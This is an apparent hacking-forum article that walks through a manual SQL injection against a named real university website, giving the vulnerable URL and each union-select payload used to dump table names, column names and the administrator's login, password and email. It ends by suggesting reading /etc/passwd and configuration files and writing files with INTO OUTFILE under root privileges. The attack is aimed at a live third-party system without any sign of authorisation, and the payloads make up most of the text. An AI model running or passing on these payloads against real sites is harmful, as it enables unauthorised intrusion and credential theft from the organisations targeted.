WAP手机版 RSS订阅 加入收藏  设为首页
黑客技术
当前位置:首页 > 黑客技术

对马德里自治大学的一次手工注入

时间:2019/7/13 11:38:36   作者:安琪   来源:www.hack361.com   阅读:0   评论:0
内容摘要:对马德里自治大学的一次手工注入作者:安琪注入点:http://www.ahnfmed.uam.es/en/ver_modulo.php?id=12orderby3正常orderby4出错http://www.ahnfmed.uam.es/en/ver_modulo.php?id=12and1=2unionselect1...

对马德里自治大学的一次手工注入


作者:安琪


注入点:http://www.ahnfmed.uam.es/en/ver_modulo.php?id=12

order by 3 正常 order by 4出错
http://www.ahnfmed.uam.es/en/ver_modulo.php?id=12 and 1=2 union select 1,2,3 返回 1,2
说明显示位是1,2
http://www.ahnfmed.uam.es/en/ver_modulo.php?id=12 and 1=2 union select group_concat(table_name),2,3 from information_schema.tables 

爆出所有表名 发现ANATOMIA_Usuarios是管理员表
http://www.ahnfmed.uam.es/en/ver_modulo.php?id=12 and 1=2 union select group_concat(column_name),2,3 from information_schema.columns where table_name=char(65,78,65,84,79,77,73,65,95,85,115,117,97,114,105,111,115) 爆出 login pass email
http://www.ahnfmed.uam.es/en/ver_modulo.php?id=12 and 1=2 union select login,pass,3 from ANATOMIA_Usuarios 爆出管理员 账号 密码。

其实这个站的权限是root,但是不支持外部连接,又找不到PHPmyadmin. 



root 读/etc/passwd 读配置 然后into outfile

标签:手工注入 马德里自治大学 
相关评论

本站资源来自互联网收集 仅供用于学习和交流 请遵循相关法律法规 本站一切资源不代表本站立场

Copyright 2018 黑客361 www.hack361.com All Rights Reserved 

站长QQ1437232096

技术交流群99802923